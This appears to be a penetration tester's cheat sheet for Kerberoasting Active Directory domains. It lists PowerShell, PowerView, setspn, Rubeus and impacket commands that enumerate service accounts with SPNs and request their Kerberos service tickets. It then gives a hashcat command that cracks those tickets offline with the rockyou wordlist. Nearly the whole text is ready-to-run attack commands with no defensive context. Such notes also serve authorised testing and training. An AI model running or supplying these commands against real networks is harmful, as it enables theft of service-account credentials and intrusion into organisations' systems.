Tags
KerberosAuthenticated
Identify
Windows
AD Module in powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Using Powerview
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
setspn.exe -Q */*
Using Rubeus
.\Rubeus.exe kerberoast /stats
Linux
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username
Exploit
From Linux
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user
you can also use -outputfile <name>
Crack hash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
From Windows
‣
PowerView
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
On Windows Server 2019 and above you cannot force a downgrade to rc4 ticket type. It will always respond with AES at minimum.